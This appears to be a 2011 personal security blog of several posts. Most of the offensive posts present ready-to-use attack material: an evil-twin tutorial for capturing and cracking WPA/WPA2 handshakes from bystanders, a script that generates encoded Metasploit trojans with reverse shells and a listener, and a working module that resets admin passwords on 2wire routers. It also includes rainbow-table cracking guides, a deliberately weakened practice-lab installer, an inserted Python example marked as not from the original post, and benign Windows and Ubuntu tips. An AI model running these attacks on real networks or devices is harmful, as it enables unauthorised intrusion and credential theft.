Monday, October 3, 2011

The Many Faces Of God Mode In Windows 7 - With Script

Some of you may already be familiar with "God Mode" in Windows 7. It is a special tool which the Windows developer team left for their own convenience, to make enabling and disabling several Windows functions quick and easy. However, there is more than one of these: I have found 39 and will show you how to access them, and also provide a script to do that. It should be noted that these are for Windows 7 and will not work on Windows XP (although there are some GUID tricks there too, these just aren't them). The default God Mode was to add ".{ED7BA470-8E54-465E-825C-99712043E01C}" to the end of a folder name. So, for example, if you create a folder titled "Main GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}", it creates a folder called "Main GodMode" which, when double-clicked, gives you what you see below instead of an empty folder.

God Mode folder View

However, this is just another parlor trick by Windows Explorer. Look at it from the command line and you will see it's still just a folder, but Windows handles it differently.

CMD view of the folder

Looking into the Windows Registry, you can see that the CLSID resolves to a shell object implemented in the shell32.dll file in the system32 folder; Explorer loads that handler instead of showing the folder's contents.

Registry view of HKEY_CLASSES_ROOT\CLSID\{ED7BA470-8E54-465E-825C-99712043E01C}

With some searching I was able to create a batch file script that will create these "modules". The script creates a folder called "GodModes" wherever it is run, then creates 39 known God Mode folders under it for you to use, which gives you a decent "this is what the Control Panel should have been" folder.

View of the GodMode Folder from the script.

Without further delay, here is the script.
==================================================================
@echo off
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
rem \\ this script will create a folder in it's \\
rem \\ Current Directory called GodModes and then \\
rem \\ create several "God Mode" folders under it \\
rem \\ Which in Windows vista\7 will trigger some \\
rem \\ Control Panel as well as hidden functions \\
rem \\ Hidden in some of windows system DLLs. \\
rem \\ \\
rem \\ Note: Some of these do NOT work on vista. \\
rem \\ For Those it will just show a folder. \\
rem \\ Also one of these only works on win7 Ultimate\\
rem \\ Which is the BitLocker Module \\
rem \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
echo.
echo ***********************************************
echo Enable Windows 7 God Mode Modules v1.0
echo ***********************************************
echo Coded By: Travis Phillips
echo on: 10/03/2011
echo.
echo [*] Creating folder .\GodModes
mkdir "GodModes"
echo.
echo [*] Changing to .\GodModes
cd GodModes
echo.
echo [*] Creating GodMode "Default Geolocation"...
mkdir "Default Geolocation.{00C6D95F-329C-409a-81D7-C46C66EA7F33}"
echo.
echo [*] Creating GodMode "Biometrics"...
mkdir "Biometrics.{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}"
echo.
echo [*] Creating GodMode "Power Plan"...
mkdir "Power Plan.{025A5937-A6BE-4686-A844-36FE4BEC8B6D}"
echo.
echo [*] Creating GodMode "Personalization Control Panel"...
mkdir "Personalization Control Panel.{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921}"
echo.
echo [*] Creating GodMode "Taskbar Notification Area"...
mkdir "Taskbar Notification Area.{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}"
echo.
echo [*] Creating GodMode "Administration Tools"...
mkdir "Administration Tools.{D20EA4E1-3957-11d2-A40B-0C5020524153}"
echo.
echo [*] Creating GodMode "Windows Vault (auto logon)"...
mkdir "Windows Vault (auto logon).{1206F5F1-0569-412C-8FEC-3204630DFB70}"
echo.
echo [*] Creating GodMode "Ease of Access"...
mkdir "Ease of Access.{D555645E-D4F8-4c29-A827-D93C859C4F2A}"
echo.
echo [*] Creating GodMode "Install Program from the Network"...
mkdir "Install Program from the Network.{15eae92e-f17a-4431-9f28-805e482dafd4}"
echo.
echo [*] Creating GodMode "Network Map"...
mkdir "Network Map.{E7DE9B1A-7533-4556-9484-B26FB486475E}"
echo.
echo [*] Creating GodMode "Default Programs"...
mkdir "Default Programs.{17cd9488-1228-4b2f-88ce-4298e93e0966}"
echo.
echo [*] Creating GodMode "Windows SideShow"...
mkdir "Windows SideShow.{E95A4861-D57A-4be1-AD0F-35267E261739}"
echo.
echo [*] Creating GodMode "DOT NET Framework Modules"...
mkdir "DOT NET Framework Modules.{1D2680C9-0E2A-469d-B787-065558BC7D43}"
echo.
echo [*] Creating GodMode "GPS Sensors"...
mkdir "GPS Sensors.{E9950154-C418-419e-A90A-20C5287AE24B}"
echo.
echo [*] Creating GodMode "Manage Wireless Networks"...
mkdir "Manage Wireless Networks.{1FA9085F-25A2-489B-85D4-86326EEDCD87}"
echo.
echo [*] Creating GodMode "Network"...
mkdir "Network.{208D2C60-3AEA-1069-A2D7-08002B30309D}"
echo.
echo [*] Creating GodMode "My Computer"...
mkdir "My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
echo.
echo [*] Creating GodMode "Computers and Devices"...
mkdir "Computers and Devices.{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"
echo.
echo [*] Creating GodMode "Manage Printers"...
mkdir "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"
echo.
echo [*] Creating GodMode "Recent Places"...
mkdir "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"
echo.
echo [*] Creating GodMode "Bluetooth Devices"...
mkdir "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"
echo.
echo [*] Creating GodMode "Workspaces Center (Remote Connections)"...
mkdir "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
echo.
echo [*] Creating GodMode "Windows Firewall"...
mkdir "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"
echo.
echo [*] Creating GodMode "Favorites"...
mkdir "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"
echo.
echo [*] Creating GodMode "Windows Update"...
mkdir "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"
echo.
echo [*] Creating GodMode "Rate and Improve Computer Performance"...
mkdir "Rate and Improve Computer Performance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"
echo.
echo [*] Creating GodMode "Main Godmode"...
mkdir "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"
echo.
echo [*] Creating GodMode "Speech Recognition"...
mkdir "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"
echo.
echo [*] Creating GodMode "User Accounts"...
mkdir "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"
echo.
echo [*] Creating GodMode "Action Center"...
mkdir "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"
echo.
echo [*] Creating GodMode "Backup and Restore"...
mkdir "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"
echo.
echo [*] Creating GodMode "Display"...
mkdir "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"
echo.
echo [*] Creating GodMode "Recovery"...
mkdir "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"
echo.
echo [*] Creating GodMode "AutoPlay"...
mkdir "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"
echo.
echo [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...
mkdir "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"
echo.
echo [*] Creating GodMode "Font Settings"...
mkdir "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"
echo.
echo [*] Creating GodMode "Parental Controls"...
mkdir "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"
echo.
echo [*] Creating GodMode "Sync Center"...
mkdir "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"
echo.
echo [*] Creating GodMode "System Information"...
mkdir "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"
echo.
echo [*] Changing back to .\
cd ..
==================================================================

Friday, September 2, 2011

No Access Point? No Problem!: How to get a WPA/WPA2 4-way handshake using Airbase-ng

Today we are going to look at how to get a WPA/WPA2 4-way handshake from a client using Airbase-ng, without the client being connected to or near its access point. This is useful because a lot of machines send out probe requests for old access points they've connected to (you will see them at the bottom right while running airodump-ng). This means the machine is looking for that access point and wants to connect to it. What we will do with Airbase-ng is pretend we are that access point and let it attempt to connect to us.

So for this tutorial I will be using:
- One Attacker Box running BackTrack 5
- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set

Step 1: Going in to Monitor Mode

With that said, let's first get things set up on the attacking machine by putting our wireless card into monitor mode using airmon-ng. Since my wireless interface is "wlan0", I would use the command "airmon-ng start wlan0". This will give us a virtual interface called "mon0" which is in monitor mode.

Airmon-ng setting wlan0 to monitor mode.

Step 2a: Setting up the fake AP (Single Known Target Method)

Use this method if you know the target's AP ESSID or you only want to attack that one; otherwise use Step 2b instead, but still read this section first to get a better understanding. Next, let's take a moment to look at the help options for airbase-ng, pictured below.

Airbase-ng Help

So now let's set up our options. For this attack I'm going to use the following command. (Note: this is case sensitive, so pay close attention.)

airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0


I owe you a little explanation of what the command does. Here's a quick breakdown, as per the help screen.

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • --essid <ESSID> : specify a single ESSID (short -e)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the fake AP is going to run on
  • -i iface : capture packets from this interface
So, basically this command sets up mon0 to listen and answer (-i mon0 mon0) as a WPA2-TKIP access point (-Z 2) running on channel 1 (-c 1) with the SSID of linksys (--essid linksys), and logs all frames to a capture file on the desktop (-F ./Desktop/WPA-attack.cap).

Airbase-ng in Action

Above is a console picture of it in action. As you can see in the last 3 lines, the machine is attempting to authenticate to our fake AP. Once you see this line, it is safe to open another terminal and open the pcap file (in my case ./Desktop/WPA-attack.cap-01.cap) with aircrack-ng to confirm you got a handshake.

Aircrack-ng shows we have the handshake!

So on this note, we see we got a handshake!

Step 2b: Setting up the fake AP (Unknown Target Method)

Warning: This method will attempt to attack every probe it sees! If you don't know the ESSID of the client, or just want to attack everyone in the area (airport or coffee shop, anyone?), use this type of command.

airbase-ng -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0

It's pretty much the same as the one from Step 2a, except instead of "--essid linksys" we use "-P -C 500" (case sensitive, so note they are uppercase switches).

usage: airbase-ng <options> <replay interface>
  • -F prefix : write all sent and received frames into pcap file
  • -P : respond to all probes, even when specifying ESSIDs
  • -C seconds : enables beaconing of probed ESSID values (requires -P)
  • -Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
  • -c channel : sets the channel the AP is running on
  • -i iface : capture packets from this interface

Airbase-ng Responding to all beacons.

With this approach I changed the victim's wireless connection settings from linksys to "testing". As you can see, it found the probe, repeated it as a beacon, and allowed the client to connect, thus also getting the handshake, same as above.

Step 3a: Cracking it with Cowpatty and rainbow tables

This is my preferred method of cracking WPA/WPA2. However, Cowpatty (even the install on BackTrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it following an article I wrote on how to do this step-by-step, or via a script I coded for that, both of which can be found here. With Cowpatty patched, just use the following command:

Command to crack using Cowpatty.

cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable

In this command, -r points cowpatty to the capture file with the handshake. -s indicates the ESSID to the program. Finally, -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty, I recommend you check out the Church of WiFi set from Renderlab's webpage, as they have a free set containing 33GB of tables made from the top 1,000 SSIDs seen on WiGLE (Wireless Geographic Logging Engine), a community site where wardrivers upload their GPS wardriving data to be mapped for all to see.



If that image isn't encouragement to get your rainbow tables, I don't know what is. Cracked after 395,442 tries in about 2.5 seconds!!! So worth the download and space to keep these handy. If the SSID is one not in the kit, you can make it following this post here.

Step 3b: Cracking it with aircrack-ng using a Dictionary

In this attack we will use Aircrack-ng with the default dictionary that comes with BackTrack (located at /pentest/password/wordlist/darkc0de.lst). This is just to show you a second method and give you something to compare the time difference between rainbow table and dictionary attacks. To run it, just do the following:

aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w /pentest/password/wordlist/darkc0de.lst

Aircrack-ng target selection
On mine it was number two, but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.

Aircrack-ng Finished Cracking
As you can see this worked too, but it took 16 mins instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people; if you have any questions, feel free to leave them in the comments area.

Enjoy and stay out of trouble! ;-)

Tuesday, August 23, 2011

installDVWA.sh - Script to Download, Configure, and launch Damn Vulnerable Web App on Backtrack 5

So I recently needed to automate this process, as it had to be done on over 30 machines; I'm lazy, and if I have to do something more than once it's getting automated. This script will download DVWA (Damn Vulnerable Web App), unzip it, copy it into your web root, configure it, start Apache and MySQL, and set up the MySQL database with the DVWA data, all in ~30-45 seconds.

So first a screenshot of it:

ScreenShot of installDVWA.sh

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
echo -e "\n#######################################"
echo -e "# Damn Vulnerable Web App Installer Script #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e -n "\n[*] Changing directory to /var/www..."
cd /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Removing default index.html..."
rm index.html > /dev/null
echo -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."
cd /tmp
echo -e "Done!\n"

echo "[*] Downloading DVWA..."
wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zip
echo -e "Done!\n"

echo -n "[*] Unzipping DVWA..."
unzip DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Deleting the zip file..."
rm DVWA-1.0.7.zip > /dev/null
echo -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."
cp -R dvwa/* /var/www > /dev/null
echo -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."
rm -R dvwa > /dev/null
echo -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."
cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1
sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.ini
rm /etc/php5/apache2/php.ini1
echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/uploads..."
chmod 777 /var/www/hackable/uploads/
echo -e "Done!\n"

echo -n "[*] Starting Web Service..."
service apache2 start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Starting MySQL..."
service mysql start &> /dev/null
echo -e "Done!\n"

echo -n "[*] Updating Config File..."
cp /var/www/config/config.inc.php /var/www/config/config.inc.php1
sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.php
rm /var/www/config/config.inc.php1
echo -e "Done!\n"

echo -n "[*] Updating Database..."
wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/null
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'
mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'
echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"
firefox http://127.0.0.1/login.php &> /dev/null &
echo -e "\nDone!\n"
echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
==================================================================

Thursday, July 14, 2011

Script to simplify using msfpayload & msfencode to create Metasploit payload trojans

The following is a script I coded to simplify using msfpayload and msfencode to create a Windows-based trojan and set up the listener. Let's face it, scripting is faster and easier. It also ensures the process is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask if you want a shell or meterpreter
  • Ask if you want it reverse connection or Bind port TCP
  • Request the Port number.
  • At that point it will create two files:
  • trojan.exe - your virus payload
  • msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
  • Next it will start msfcli to create a listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ "$METERORSHELL" = "1" ]; then
 SHELLTYPE='meterpreter'
else
 SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================

Wednesday, June 22, 2011

Metasploit module to reset admin password on 2wire wireless routers.

UPDATE: This module is now a part of Metasploit. Just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here.

Here is a Metasploit module I coded to reset the password on a 2wire router. It uses a setup wizard page that doesn't verify that the user is authenticated, nor remove itself after first-time setup. This can be exploited to reset the password. Without further delay, here is the code.

On my Ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

=====================================================
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'        => '2Wire Password Reset',
      'Version'     => '$Revision: 1 $',
      'Description' => %Q{
        This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard
        page that fails to check if a user is authenticated and doesn't remove or block after first access.
      },
      'Author'      => 'Travis Phillips',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('PASSWORD', [ true, 'What you want the password reset to', 'admin'])
      ], self.class)
  end

  def run
    print_status("Attempting to reset password to #{datastore['PASSWORD']} on #{rhost}\n")
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri'    => '/xslt',
        'data'   => 'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] + '&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
      }, 25)
    # send_request_cgi returns nil on a timeout or connection failure, so guard before reading res.code
    if res && res.code == 200 && res.headers['Set-Cookie']
      print_status("Password reset successful!\n")
    end
  end
end
=====================================================

Saturday, June 18, 2011

How to Generate Rainbow Tables for Cowpatty using genpmk to crack WPA/WPA2

Over the past few days I've had people ask me how to generate rainbow tables for Cowpatty. It's quite simple. Just a few things you should know first:

- Each table is for ONE ESSID. In WPA/WPA2, the SSID of the network is used as the salt when the passphrase is hashed into the key, so a table built for one SSID is useless against any other.

- You will want to find a good password dictionary file. I recommend the Renderlab church of wifi's password list found here.

- Passwords MUST be over 8 characters in length. So if you have a password list, weed out any smaller passwords.

And on with the show. Let's first look at the help screen.

genpmk 1.1 - WPA-PSK precomputation attack.
genpmk: Must specify a dictionary file with -f
Usage: genpmk [options]

-f Dictionary file
-d Output hash file
-s Network SSID
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

After precomputing the hash file, run cowpatty with the -d argument.

So, to generate a rainbow table we need to provide a dictionary, an SSID, and an output file for it to write the hashes to. Using the above, we can do the following:

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will create a rainbow table called "HackMe" which contains hashes of all the passwords in the file "final-wordlist.txt" salted with the SSID "HackMe". The shell output should update as every 1,000 hashes are created.

The whole process isn't actually all that bad time-wise, and the file size for a rainbow table using the password file I suggest is ~40 MB. Not too bad considering the speed boost it gives when you go to crack it.
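To make concrete why each table is tied to one ESSID, here is an added Python example (not part of the original post, and not genpmk's or coWPAtty's code) that performs the same precomputation genpmk does: the WPA/WPA2 PMK is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as the salt, 4096 iterations, 256 bits. The wordlist and SSIDs are constructed inline, and `derive_pmk`, `build_pmk_table`, `find_passphrase` and `SAMPLE_WORDLIST` are names chosen for this example; it also shows why a non-default SSID forces a fresh table to be computed.

```python
import hashlib
from typing import Dict, Iterable, Optional

# IEEE 802.11i parameters for deriving the PMK from a WPA/WPA2 passphrase.
PMK_ITERATIONS = 4096
PMK_LENGTH = 32  # bytes (256 bits)

# Constructed sample wordlist for this example. It deliberately includes
# entries outside the valid WPA passphrase length (8 to 63 characters),
# which the table builder below skips instead of hashing.
SAMPLE_WORDLIST = [
    "short",            # too short: not a valid WPA passphrase
    "password",
    "letmein123",
    "correcthorse",
    "a" * 64,           # too long: not a valid WPA passphrase
]


def valid_passphrase(passphrase: str) -> bool:
    """WPA/WPA2 passphrases are 8 to 63 printable ASCII characters."""
    return 8 <= len(passphrase) <= 63 and all(32 <= ord(c) <= 126 for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits).

    The SSID is the salt, which is why a precomputed table only
    applies to one network name.
    """
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), PMK_ITERATIONS, PMK_LENGTH
    )


def build_pmk_table(ssid: str, wordlist: Iterable[str]) -> Dict[bytes, str]:
    """Precompute PMK -> passphrase for one SSID, as genpmk -s <SSID> does.

    Entries with an invalid passphrase length are skipped.
    """
    table: Dict[bytes, str] = {}
    for word in wordlist:
        word = word.rstrip("\r\n")
        if not valid_passphrase(word):
            continue
        table[derive_pmk(word, ssid)] = word
    return table


def find_passphrase(table: Dict[bytes, str], candidate_pmk: bytes) -> Optional[str]:
    """Offline lookup: a table hit replaces 4096 HMAC rounds per guess."""
    return table.get(candidate_pmk)


def tables_differ_by_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs under two SSIDs."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


if __name__ == "__main__":
    ssid = "HackMe"
    table = build_pmk_table(ssid, SAMPLE_WORDLIST)
    print(f"{len(table)} PMKs precomputed for SSID {ssid!r}")
    # A PMK derived for this SSID is an O(1) lookup in the table ...
    print("lookup for HackMe:", find_passphrase(table, derive_pmk("letmein123", ssid)))
    # ... but the same passphrase under another SSID is not in it at all.
    print("lookup for linksys:", find_passphrase(table, derive_pmk("letmein123", "linksys")))
    print("same passphrase, other SSID differs:",
          tables_differ_by_ssid("letmein123", "HackMe", "linksys"))
```

The IEEE 802.11i test vector (passphrase "password", SSID "IEEE") is a quick way to confirm the derivation matches the standard before trusting a table built this way.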

Patch, Compile, and Installing coWPAtty 4.6 on Ubuntu

Cowpatty is a great tool for cracking WPA/WPA2 keys via either a dictionary attack or rainbow tables. All it needs is to see a client connect to the network (this is called a "handshake"). However, cowpatty isn't perfect and has a problem reading some handshakes correctly. After looking into this I found a way to install it with the patch on my Ubuntu box.

First we need to install the required packages. If you already have them you can skip this step.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
sudo apt-get install libpcap0.8-dev
sudo apt-get install libdigest-hmac-perl

Next Download cowpatty 4.6

wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz

You should get b90fd36ad987c99e7cc1d2a05a565cbd as the MD5 sum. If so, extract it and move into the directory using the following:

tar -xvf cowpatty-4.6.tgz
cd cowpatty-4.6

Next we need to download the patch and patch the source code.

wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
patch < cowpatty-4.6-fixup16.patch

Next we will compile and install it and then test it

make
sudo make install
cd ..
cowpatty

If all goes well you should see the cowpatty help menu:

cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Must supply a pcap file with -r

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Now if you're as lazy as me, here's everything together as a script:

#!/bin/bash
echo -e "\n \e[1;31m[*] Installing build-essential\e[0m"
sudo apt-get -y install build-essential
echo -e "\n \e[1;34m[*] Installing libssl-dev\e[0m"
sudo apt-get -y install libssl-dev
echo -e "\n \e[1;34m[*] Installing libpcap0.8-dev\e[0m"
sudo apt-get -y install libpcap0.8-dev
echo -e "\n \e[1;34m[*] Installing libdigest-hmac-perl\e[0m"
sudo apt-get -y install libdigest-hmac-perl
echo -e "\n \e[1;34m[*] Downloading cowpatty-4.6.tgz\e[0m"
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz
md5sum cowpatty-4.6.tgz
echo -e "\e[1;34mMD5 SHOULD BE b90fd36ad987c99e7cc1d2a05a565cbd\e[0m"
echo -e "\n \e[1;34m[*] Extracting cowpatty-4.6.tgz\e[0m"
tar -xvf cowpatty-4.6.tgz > /dev/null
cd cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Downloading Cowpatty Patch\e[0m"
wget http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Patching Cowpatty code\e[0m"
patch < cowpatty-4.6-fixup16.patch
echo -e "\n \e[1;34m[*] Compiling Cowpatty\e[0m"
make
echo -e "\n \e[1;34m[*] Installing cowpatty to system\e[0m"
sudo make install
echo -e "\n \e[1;34m[*] Removing Cowpatty Directory\e[0m"
cd .. > /dev/null
rm -r -f cowpatty-4.6 > /dev/null
echo -e "\n \e[1;34m[*] Removing cowpatty-4.6.tgz\e[0m"
rm cowpatty-4.6.tgz > /dev/null
echo -e "\n \e[1;34m[*] testing to see if cowpatty works\e[0m"
cowpatty
echo -e "\n \e[1;34m[*] Done!\e[0m"


Links:

http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz - Get coWPAtty here
http://proton.cygnusx-1.org/~edgan/cowpatty/cowpatty-4.6-fixup16.patch - Patch to fix several issues with cowpatty
http://www.renderlab.net/projects/WPA-tables/ - A place to get 33GB of Rainbow tables for free download.


Wednesday, March 16, 2011

How to make ubuntu 10.10 use Sun Java instead of OpenJDK

I had an issue where the default OpenJDK that comes with Ubuntu 10.10 was not letting me run an applet I needed. Here is how, in 6 commands, you can switch from OpenJDK to Sun Java.


sudo apt-get purge openjdk-6-jre openjdk-6-jre-headless
sudo add-apt-repository "deb http://archive.canonical.com/ maverick partner"
sudo apt-get update
sudo apt-get install sun-java6-jre sun-java6-plugin
sudo apt-get install sun-java6-fonts
sudo update-java-alternatives --set java-6-sun


Line 1 : Removes OpenJDK from your machine
Line 2-3: Allows you to use the partner repository which has the sun packages and updates apt
Line 4-5: Installs the needed files needed for the Sun JRE to run
Line 6 : Tells your system to only use the sun java binaries.

Hope this helps

Tuesday, February 8, 2011

How To Move the Buttons on Ubuntu 10.04 from the Left to the Right with one command

So, Ubuntu decided to hop on the Apple bandwagon and move the close, minimize and maximize buttons at the top of the window to the left. This annoyed me to no end. So after some searching I found this simple one-liner!

gconftool-2 --set /apps/metacity/general/button_layout --type string menu:minimize,maximize,close

(Shoutouts to http://www.junauza.com/2010/05/move-ubuntu-1004-window-buttons-from.html for finding this)